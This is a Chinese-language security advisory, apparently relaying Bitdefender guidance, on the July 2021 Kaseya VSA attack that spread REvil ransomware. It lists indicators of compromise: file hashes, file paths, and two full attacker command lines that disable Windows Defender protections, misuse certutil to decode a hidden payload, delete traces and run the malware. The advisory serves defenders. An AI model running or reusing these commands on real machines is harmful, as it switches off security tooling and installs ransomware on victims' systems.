2021 年 7 月 3 日美國東部時間上午 10:00 ，遠程IT管理軟件廠商Kaseya發布了緊急安全通告，Kaseya 的 VSA 產品成為復雜網絡攻擊的受害者，攻擊者正在使用Kaseya來分發REvil勒索病毒。

[[409321]]

Kasaya安全通告：

公告原文：https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender正在積極監控和分析使用 Kaseya 發動的高級攻擊，Bitdefender迄今為止的調查結果表明，Bitdefender 解決方案可檢測并阻止攻擊中使用的命令行操作和交付的惡意payload，從而保護Bitdefender客戶免受此次復雜的攻擊。

由于這是一個不斷變化的情況，我們將在可用時使用其他信息更新這篇文章。

Bitdefender 客戶指南：

• Kaseya 安全公告， 懇請其客戶立即關閉本地 VSA 服務器。我們建議任何 Kaseya VSA 用戶立即遵循此指南。
• 檢查本地和混合環境中的已知IoC指標 (IoC) - IoC 列表如下。
• 美國網絡安全和基礎設施安全局 (CISA) 已 發布 警報 ，稱他們正在監控有關針對 Kaseya VSA 和使用 VSA 軟件的多個 MSP 的攻擊的詳細信息。我們建議組織遵循 CISA 警報以獲取未來更新。

經過驗證的IoC指標 :

1. 從 Kaseya 代理執行的命令行：

C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

和

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

2. 哈希：

• 561cffbaba71a6e8cc1cdceda990ead4，Bitdefender 在 2021 年 5 月 15 日已檢測到，檢測為 Gen:Variant.Graftor.952042。這是使用 certutil.exe 加密的主要可執行文件 ( c:\kworking\agent.exe)
• a47cf00aedf769d60d58bfe00c0b5421，Bitdefender 在 2021 年 5 月13 日已檢測到，檢測為 Gen:Variant.Bulz.471680。這是一個由主可執行文件投遞并使用 MS msmpeng.exe 可執行文件側面加載的 DLL。
• 0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的內容)。

3. 文件路徑：

• c:\WarCoMWorking\agent.crt
• c:\WarCoMWorking\agent.exe
• c:\kworking\agent.exe
• c:\kworking\agent.crt

c:\windows\msmpeng.exe(較舊的版本，容易受到 DLL 側加載的影響)。此版本被主要可執行文件投遞，并進一步用于加載 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本：MsMpEng.exe，Microsoft 惡意軟件保護，4.5.0218.0

正在使用Bitdefender EDR的客戶，可以使用IOC掃描功能，在全網中地毯式搜索IOC指標：

添加黑名單規則：在黑名單區域，可以添加上述IOC的哈希，全網阻斷運行：